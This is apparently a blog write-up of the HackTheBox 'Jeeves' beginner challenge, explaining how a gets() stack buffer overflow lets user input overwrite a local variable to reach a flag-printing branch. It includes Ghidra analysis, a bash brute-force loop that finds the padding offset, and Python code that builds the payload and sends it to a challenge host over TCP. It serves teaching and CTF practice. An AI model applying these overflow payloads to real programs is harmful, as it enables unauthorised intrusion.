Getting Started in Binary Exploitation

N0ur5
11 min read · Jul 20, 2024

Hello Reader,

Today I am going to break out of the blogging and studying slump that I have been in by touching on a subject that I personally haven’t dealt with much despite being a pentester for several years. This subject is the art of binary exploitation. I am unsure how much this class of vulnerability still occurs “in the wild”, but in my mind, studying binary exploitation will help further my understanding of how binaries work. It was something that OSCP used to push students to learn so that they could complete the buffer overflow modules/challenges. However, they have since taken that concept out of the exam in favor of a heavier focus on the more commonly targeted Active Directory. HackTheBox has a learning path called “Intro to Binary Exploitation”, which is another reason I am deciding to get into this area of study for a little while.

So, where do we start with analyzing a binary file? As I mentioned, I am starting with the HackTheBox Learning Path for this exact subject, and the first challenge listed for this learning path is called “Jeeves”. So, the Jeeves challenge is where I will start! HackTheBox hosts the ELF binary called “Jeeves”, which is downloaded as a ZIP file that contains only the single Jeeves binary. Once the ZIP is extracted with the password provided by HackTheBox, the analysis can begin.

First, we can confirm the file type with the “file” command:

file ./jeeves
As per Wikipedia: “In computing, the Executable and Linkable Format (ELF, formerly named Extensible Linking Format) is a common standard file format for executable files, object code, shared libraries, and core dumps.”
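To make the “file” check a little less magical, here is a minimal Python sketch of the kind of thing it looks at: the first bytes of an ELF file. The function name and the sample bytes are my own assumptions for illustration. The sample is hand-made, not read from the real jeeves binary, and the real “file” command inspects far more than this.

```python
ELF_MAGIC = b"\x7fELF"  # every ELF file starts with these four bytes


def describe_elf_header(header: bytes) -> dict:
    """Decode the class and byte-order fields from the start of an ELF file."""
    if len(header) < 6 or header[:4] != ELF_MAGIC:
        raise ValueError("not an ELF file (magic bytes missing)")
    # Byte 4 (EI_CLASS): 1 means 32-bit, 2 means 64-bit.
    elf_class = {1: "32-bit", 2: "64-bit"}.get(header[4], "unknown")
    # Byte 5 (EI_DATA): 1 means little-endian, 2 means big-endian.
    byte_order = {1: "little-endian", 2: "big-endian"}.get(header[5], "unknown")
    return {"class": elf_class, "byte_order": byte_order}


# Hand-made 16-byte identification block (an assumption, not the real file).
sample = b"\x7fELF\x02\x01\x01" + b"\x00" * 9
print(describe_elf_header(sample))
# {'class': '64-bit', 'byte_order': 'little-endian'}
```

To try it on the actual download, something like `describe_elf_header(open("./jeeves", "rb").read(16))` should work.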

We can also run the “strings” command which can sometimes give away tidbits of useful information.

strings ./jeeves
We can see “flag.txt”, a commonly targeted file when completing web-based “hacking” challenges or labs. We can also see that the file was compiled with GCC, along with some other strings that are likely to be shown to the user who runs the application.
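For the curious, what “strings” does can be approximated in a few lines of Python: scan the raw bytes and keep every run of printable ASCII characters that is at least four characters long. This is only a rough sketch. The function name is made up, the sample blob is hand-built from strings quoted in this post, and the real tool has more options and slightly different rules.

```python
import re


def printable_strings(data: bytes, min_len: int = 4) -> list:
    """Return runs of printable ASCII (space through '~') of at least min_len bytes."""
    pattern = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    return [match.decode("ascii") for match in pattern.findall(data)]


# Hand-made blob mixing binary junk with readable text (not the real binary).
blob = (
    b"\x00\x01\x02flag.txt\x00\x7f\x03"
    b"Hello %s, hope you have a good day!\n\x00"
    b"ab\x00\xff\xfe"
)
for text in printable_strings(blob):
    print(text)
# flag.txt
# Hello %s, hope you have a good day!
```

The two-character run “ab” is dropped because it is shorter than the minimum length, which is how the tool filters out most random noise.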

Simplest of all, perhaps: we can just run the binary!

chmod +x ./jeeves  #allows for the file to be executed
./jeeves #executes the file
The file asks for our name, and then tells us to have a great day. How nice ❤

Again — this is not a topic I know much about… however what I do know is most entry level challenges/labs for binary exploitation usually start with the concept of a buffer overflow — or a vulnerability in a binary where the application doesn't properly restrict the size of user-input. Given that we are asked for basic input and then the input is returned to us, I am already assuming that is going to be conceptually what we are dealing with in the Jeeves challenge.

To get a better idea of what the application is doing we *could* run objdump on Jeeves, but this results in a wall of very ugly “assembly code” (a symbolic representation of “machine instructions”). I suppose if one was well-versed in assembly code, this tool alone might be enough to at least find the vulnerability in the code.

objdump -d ./jeeves
Only a fraction of the output from “objdump”.

Since I am certainly not well versed in assembly code (a topic I will touch on in the future), I wanted to understand what other tools could be used here. It seems like the perfect use case for a tool called “Ghidra”.

This tool was released by the NSA during the 2019 RSA Conference. It was pretty big news within the cybersecurity world when it happened.

We have this fancy tool created by the NSA that is intended to reverse engineer software. If that doesn’t sound like the right fit for binary exploitation, I don’t know what does! It wasn’t installed on the Kali Linux instance I had readily available, so I went ahead and installed it from the Kali repository.

sudo apt-get install ghidra  #Downloads and installs Ghidra
ghidra #Launches Ghidra

Once Ghidra is open, you will need to create a new project and then import the jeeves file. I followed steps 1 and 2 from this other Medium article by “ax1al” https://medium.com/ax1al/exploring-ghidra-with-baby-elf-29c986e80a45 which did a great job of getting me rolling with Ghidra. Thanks ax1al!

At this point, I just double clicked on the binary file that was imported and I was presented with a pop-up that asked if I wanted to analyze the binary. I clicked “yes” and “analyze”, which brought me into the “CodeBrowser”. This was a place I could get lost quickly, as several windows with plenty of output exist in this view. However, as a reminder, I do have some very limited knowledge on this topic and I know a good place to start is the “main” function. In several programming languages (C included), the “main” function is where the program’s own code starts executing. So I find the “main” function under “Functions” within the “Symbol Tree” window.

Now, rather than trying to view the “main” function in assembly language to determine what it is doing, I can instead view the much easier “Decompiled” version of the code. As far as I currently understand, Ghidra decompiles to a C-like syntax to the best of its ability.

Quickly I notice many of the strings that I saw either when running the “strings” command, or when executing the application.

So, what are we looking at here?

  • Line 2: Creating the “main” function, with lines 4–22 being the main function’s instructions
  • Lines 5–8 seem to be declaring variables
  • Line 10 initializes the “local_c” variable by assigning it 0x21523f2d as a value
  • Line 11 prints the first line we saw when we executed the binary
  • Line 12 accepts our user input (our name) and stores the value we provide in the “local_48” variable
  • Line 13 prints the last line we saw when we executed the binary, after we provided our name
  • Lines 14–19 are part of an “if” statement which will only be executed IF the local_c variable is equal to “0x1337bab3”
  • Line 21 returns 0, which for the sake of this blog we will just say means the function ran successfully. (An overly simplified explanation of this line, but not critical for today’s topic)

My first thought is “ok so we need to make local_c equal to 0x1337bab3 to open “flag.txt” … but we are never in a situation where a value (variable) that we control is deliberately placed into the “local_c” variable”. Instead, the only variable we do have control over is “local_48”.

Ok so I’m trying to figure out how the heck we can control the value of a variable we can’t access?! Our name is assigned to the “local_48” variable, and other than the local_48 variable being used in the next line to print our name to the console:

printf("Hello %s, hope you have a good day!\n",local_48)

… we do not see that variable used again in the main function.

This is where my original theory, that a buffer overflow of sorts might be the solution here, comes back into play. So to investigate that theory further, we look more closely at how the data we can enter is handled. Two things we see are:

  1. How the data is accepted. It is via the “gets()” function.

gets(local_48);

  2. How the variable local_48 gets declared at the very beginning of the main function.

char local_48 [44];

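The “char” type means each element of the variable stores a single character (one byte), and the [44] means the buffer (the space reserved for the string placed into the variable, aka our name) is 44 bytes long, so the input plus its terminating null byte should not be larger than 44 bytes. HOWEVER, the official man page (program manual) for “gets()” warns never to use it, because the function has no way of knowing how big the buffer is and will keep storing characters past the end of it: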

https://man7.org/linux/man-pages/man3/gets.3.html

In other words, “gets()” is a vulnerable C function, and the Jeeves application is accepting our user input with this very same function! So now we know *how* the application is vulnerable. Next we need to know *how* to exploit this!
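To picture why that matters, here is a toy Python model of the difference between an unbounded copy (like “gets()”) and a bounded one (like “fgets()”). Everything in it is an assumption made for illustration: memory is just a bytearray, and a 4-byte neighbour is placed directly after the 44-byte buffer, which is simpler than the real stack frame. It is not how the C library is implemented.

```python
BUF_SIZE = 44  # matches `char local_48 [44]` in the decompiled code


def gets_like(memory: bytearray, start: int, line: bytes) -> None:
    """Model gets(): store the whole line plus a NUL byte, never checking a size."""
    for i, byte in enumerate(line + b"\x00"):
        memory[start + i] = byte


def fgets_like(memory: bytearray, start: int, size: int, line: bytes) -> None:
    """Model fgets(buf, size, stdin): store at most size - 1 bytes plus a NUL byte."""
    for i, byte in enumerate(line[: size - 1] + b"\x00"):
        memory[start + i] = byte


def fresh_memory() -> bytearray:
    # Toy layout (assumption): the buffer, then a neighbouring 4-byte value.
    return bytearray(BUF_SIZE) + bytearray(b"SAFE")


line = b"A" * 46  # two bytes longer than the buffer

mem = fresh_memory()
gets_like(mem, 0, line)
print(bytes(mem[BUF_SIZE:]))  # b'AA\x00E'  -> the neighbour was clobbered

mem = fresh_memory()
fgets_like(mem, 0, BUF_SIZE, line)
print(bytes(mem[BUF_SIZE:]))  # b'SAFE'     -> the neighbour is untouched
```

The unbounded copy happily runs past the end of the buffer and into whatever sits next to it, which is exactly the behaviour we hope to abuse.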

Starting simple, we can use python to generate a string of a specific length (although you are more than welcome to try to manually type out long strings of a specific length haha) and see if at any point a segmentation fault occurs. A segmentation fault means the application crashed while trying to access memory it is not allowed to touch.

We already tried entering a basic name when we ran the application earlier. So even if we hadn’t looked at the code to learn the intended buffer size, we would at least know the application handles that “normal” or expected input correctly, since it told us “hope you have a good day!” and then exited cleanly. So let’s use python to generate a long string of exactly 64 “A” characters. Why 64? Because it’s a good number of bytes over the programmed 44-byte buffer.

python -c "print('A' * 64)"

Now let’s stuff those 64 “A”s into the “local_48” variable by entering them in when the application asks for our name.

The application appears to handle this just fine. I believe this is because the input is larger than the buffer, but not large enough to overwrite anything in memory that would cause the application to crash (like the saved return address that “main” jumps back to when it finishes, for example). So let’s bump the “A” count up to 100 using the same method as we just did.

Segmentation fault successful :) We are on the right track.
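A rough way to reason about why 64 bytes survived and 100 bytes crashed is to sketch the stack frame and ask which regions an input of a given length reaches. The layout below is an assumption, not something confirmed in a debugger: I inferred it from Ghidra’s variable names (local_48, local_c) and the usual x86-64 frame of saved base pointer followed by return address. Offsets are measured from the start of local_48.

```python
# (region name, start offset, end offset), all assumed for illustration.
FRAME = [
    ("local_48 buffer", 0, 44),
    ("padding / other locals", 44, 60),
    ("local_c", 60, 64),
    ("saved rbp", 64, 72),
    ("return address", 72, 80),
]


def regions_touched(input_len: int) -> list:
    """List the regions written when gets() stores input_len bytes plus a NUL byte."""
    written = input_len + 1  # gets() appends a terminating NUL byte
    return [name for name, start, _end in FRAME if written > start]


print(regions_touched(64))
# ['local_48 buffer', 'padding / other locals', 'local_c', 'saved rbp']
print(regions_touched(100))
# ['local_48 buffer', 'padding / other locals', 'local_c', 'saved rbp', 'return address']
```

Under these assumptions, 64 bytes stop short of the return address, while 100 bytes run over it, which would be consistent with the crash appearing only on the larger input.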

We got the segmentation fault by providing too large of a string! I think that means we are getting closer to our goal by overwriting the return address. Many times, a buffer overflow exploit works because a string can escape its intended boundary and overwrite the saved return address, the value that tells the program where to go next when the function finishes. But one protection that makes this harder, called PIE, is enabled for this application.

“PIE stands for Position Independent Executable, which means that every time you run the file it gets loaded into a different memory address. This means you cannot hardcode values such as function addresses and gadget locations without finding out where they are.”

Source: https://ir0nstone.gitbook.io/notes/types/stack/pie

How do we know this protection is enabled? We can find out with the “checksec” application.

checksec --file=./jeeves
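As far as I understand it, one of the main things a PIE check looks at is the “type” field of the ELF header: position independent executables are marked as ET_DYN (value 3), while traditional fixed-address executables are ET_EXEC (value 2). Here is a small Python sketch of that single check. The function name and the sample headers are hypothetical, shared libraries are also ET_DYN, and the real checksec does more than this, so treat it as a hint rather than a replacement.

```python
import struct

ET_EXEC = 2  # fixed-address executable
ET_DYN = 3   # shared object, which includes PIE executables


def looks_like_pie(header: bytes) -> bool:
    """Return True if the ELF header's e_type field is ET_DYN."""
    if len(header) < 18 or header[:4] != b"\x7fELF":
        raise ValueError("not an ELF header")
    # Byte 5 says whether multi-byte fields are little- or big-endian.
    fmt = "<H" if header[5] == 1 else ">H"
    # e_type is the 2-byte field right after the 16-byte identification block.
    (e_type,) = struct.unpack_from(fmt, header, 16)
    return e_type == ET_DYN


# Hand-made sample headers (assumptions, not read from the real binary).
ident = b"\x7fELF\x02\x01\x01" + b"\x00" * 9
print(looks_like_pie(ident + struct.pack("<H", ET_DYN)))   # True
print(looks_like_pie(ident + struct.pack("<H", ET_EXEC)))  # False
```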

Another option exists for exploitation using the buffer overflow though…

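The stack grows downward, toward lower memory addresses, and a function’s local variables live in its stack frame just below the saved return address. Data written into a buffer goes the other way, filling it toward higher addresses.

The vulnerable variable (local_48) comes before the variable that we want to gain control over (local_c) in that direction, so drawn with the lowest address at the top, it sits higher in the picture. I believe this means that, due to the use of the vulnerable “gets()” function to obtain the value for “local_48” (the variable containing our name), we should be able to start overwriting the variables below the one we can control! Here is a crude image of the concept.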
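There may also be a way to estimate how far apart the two variables are without running anything. My understanding is that Ghidra’s default names encode a stack offset in hex, so “local_48” sits 0x48 bytes from a reference point at the top of the frame and “local_c” sits 0xc bytes from it. If that assumption holds, the gap between them is a subtraction. The helper names below are made up for this sketch.

```python
def ghidra_stack_offset(name: str) -> int:
    """Parse the hex suffix of a Ghidra-style local name such as 'local_48'."""
    prefix, _, suffix = name.partition("_")
    if prefix != "local" or not suffix:
        raise ValueError("unexpected variable name: %r" % name)
    return int(suffix, 16)


def distance(buffer_name: str, target_name: str) -> int:
    """Bytes between the start of the buffer and the start of the target."""
    return ghidra_stack_offset(buffer_name) - ghidra_stack_offset(target_name)


# 0x48 - 0x0c = 72 - 12
print(distance("local_48", "local_c"))  # 60
```

This is only an estimate based on a naming convention, so it is worth confirming against the program itself, which is what the brute-force approach in the rest of this post does.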

Notice that eventually, we will be starting to control the value of local_c 😃. I wondered what the best way to achieve this was. In my experience as a pentester, I’ve learned that sometimes doing the same thing in different ways helps reinforce the concept. So I started with some good old bash scripting to essentially brute force the solution using the information I have obtained about the goal up to this point. So what will that look like? I will basically stick the hex value that we want into the “local_48” variable, and then continually add padding and rerun the application until the overflow perfectly aligns, placing the “0x1337bab3” value into the “local_c” variable.

First we script the byte-by-byte increase of the buffer, which looks fun…

Then I needed to append the proper hex value to the end each time. I use python to produce that payload as raw bytes.

python -c 'import os; os.write(1, b"\xb3\xba\x37\x13")'  # same bytes under Python 2 and 3
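Why are the bytes written “backwards”? On a little-endian machine the least significant byte of a number is stored first. Python’s struct module can do the conversion for us, which is a handy way to double check the hand-written byte string. This is just a sketch to illustrate the byte order, and the variable names are my own.

```python
import struct

TARGET = 0x1337BAB3  # the value the "if" statement compares local_c against

little = struct.pack("<I", TARGET)  # "<I" = little-endian unsigned 32-bit
big = struct.pack(">I", TARGET)     # ">I" = big-endian, shown for comparison

print(little.hex())  # b3ba3713
print(big.hex())     # 1337bab3

# Reading the little-endian bytes back gives the original number.
print(hex(struct.unpack("<I", little)[0]))  # 0x1337bab3
```

The little-endian result matches the `\xb3\xba\x37\x13` sequence used in the payload.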

Ok so now, I *think* we have everything we need to feed the growing buffer combined with the 1337bab3 payload to the jeeves program, while waiting for the application to print “Pleased to make your acquaintance” which we know from the “if” statement earlier, will be printed when the if statement is true.

Steady hand with the highlighter tool 👀

So the last two things I think I want to add to my script are:

  1. search for the string “acquaintance” and only print the message if it’s in the output, otherwise our terminal will be a mess.
  2. print the buffer size that was needed to trigger the solution to this challenge.

After a few minutes, my code looks like this…

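#!/usr/bin/bash

for i in {44..100};
do
  # $i "A" characters of padding
  buffer=$(python -c "print('A' * $i)")
  # raw little-endian bytes of 0x1337bab3 (os.write behaves the same under Python 2 and 3)
  payload=$(python -c 'import os; os.write(1, b"\xb3\xba\x37\x13")')
  # feed padding + payload to the program and capture what it prints
  result=$(echo "$buffer$payload" | ./jeeves)
  string="acquaintance"
  if [[ $result == *"$string"* ]]; then
    echo "HIT ON BUFFER SIZE $i"
    echo "$result"
    exit 0  # stop at the first hit
  fi
done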

The above is basically just a bash “for” loop, where the value of “i” starts at 44 (the intended buffer size) and continues up to 100. That number will be the number of “A”s printed out by python into the “buffer” variable. Then, we will use python to create the proper byte sequence for 0x1337bab3 (it goes in backwards; you will need to look into Little Endian to understand this better, as will I 😂). We will store that in the “payload” variable. Then we will combine the two variables (the buffer + the payload) and supply them to the jeeves program by “piping” the output (printing the variables out) to the jeeves program (with the “|” character). We set the “string” variable to be the word “acquaintance” and then we run an “if” statement that will only print out the jeeves output if the “string” variable is found in the output. It will also print out the buffer size. Let’s give it a whirl!
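Since doing the same thing in different ways helps reinforce the concept, here is a hedged Python sketch of the same brute-force loop. The function names are my own, and `run_local_binary` assumes the binary lives at `./jeeves`. To allow a dry run without the binary, there is also a fake target that pretends the checked value lives at a chosen offset. That fake is purely a stand-in and knows nothing about the real program.

```python
import struct
import subprocess

MARKER = b"acquaintance"               # only printed when the "if" branch runs
VALUE = struct.pack("<I", 0x1337BAB3)  # little-endian bytes of the magic value


def find_padding(run_target, start=44, stop=100):
    """Return the first padding length whose output contains MARKER, else None."""
    for padding in range(start, stop + 1):
        output = run_target(b"A" * padding + VALUE + b"\n")
        if MARKER in output:
            return padding
    return None


def run_local_binary(payload: bytes, path: str = "./jeeves") -> bytes:
    """Feed the payload to the binary on stdin and return whatever it prints."""
    result = subprocess.run(
        [path], input=payload, stdout=subprocess.PIPE, stderr=subprocess.DEVNULL
    )
    return result.stdout


def make_fake_target(offset: int):
    """Build a stand-in target that 'checks' four bytes at the given offset."""
    def fake(payload: bytes) -> bytes:
        line = payload.split(b"\n", 1)[0]  # gets() stops reading at the newline
        if line[offset:offset + 4] == VALUE:
            return b"Pleased to make your acquaintance"
        return b"hope you have a good day!"
    return fake


# Dry run against the stand-in; the offset here is an arbitrary example.
print(find_padding(make_fake_target(52)))  # 52
```

Against the real file, the call would be `find_padding(run_local_binary)`, run from the directory that contains the binary.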

So now that we know the buffer size is 60, we can properly exploit the application by supplying the proper value to make the “if” statement in the jeeves program true. The reason the flag didn’t print is because we were “practicing” on the local file we unzipped early in this blog. However, HackTheBox provides a “live” version of this application running in a docker instance that is meant to be exploited once the exploit is developed. Since we have developed the exploit by finding that 60 characters followed by the bytes for 0x1337bab3 resulted in the application behaving in the way we wanted, we could now target the live version to get the flag.

I put the solution (buffer + payload) into a file to make the next step easier.
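One possible way to script those last steps in Python is sketched below. This is not necessarily how I did it. The file name, host, and port are placeholders (HackTheBox gives each instance its own address), and the helper names are made up for this example.

```python
import socket
import struct


def build_payload(padding: int = 60, value: int = 0x1337BAB3) -> bytes:
    """Padding bytes, then the little-endian value, then a newline to end the input."""
    return b"A" * padding + struct.pack("<I", value) + b"\n"


def save_payload(path: str, payload: bytes) -> None:
    """Write the payload in binary mode so the raw bytes are not re-encoded."""
    with open(path, "wb") as handle:
        handle.write(payload)


def send_payload(host: str, port: int, payload: bytes, timeout: float = 5.0) -> bytes:
    """Send the payload over TCP and collect whatever the service replies."""
    chunks = []
    with socket.create_connection((host, port), timeout=timeout) as conn:
        conn.sendall(payload)
        try:
            while True:
                chunk = conn.recv(4096)
                if not chunk:
                    break
                chunks.append(chunk)
        except socket.timeout:
            pass  # no more data arrived before the timeout
    return b"".join(chunks)


payload = build_payload()
print(len(payload))  # 65
```

Usage would look something like `save_payload("payload.bin", payload)` followed by `print(send_payload("HOST", PORT, payload))`, with HOST and PORT replaced by the values shown for your own instance.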

Well, there we have it folks. The brute force approach to solving the jeeves binary exploitation challenge — which was to overwrite a variable on the stack that was later used in an “if” statement to determine if “flag.txt” would be printed or not!

I think that is all for this post. I hope to revisit this same challenge, as mentioned earlier, with a new approach. Rather than brute-forcing the buffer size “blindly”, we will look at how we can use “IDA” to take a more surgical approach to completing this challenge. IDA has a debugging feature that will give us some dynamic code analysis abilities, including looking at the stack while the application is running, which we just had to imagine while we were overwriting the variables blindly with brute force.

Thanks as always!

N0ur5

Written by N0ur5

Pentester, bug hunter, red/purple teamer, all that good stuff.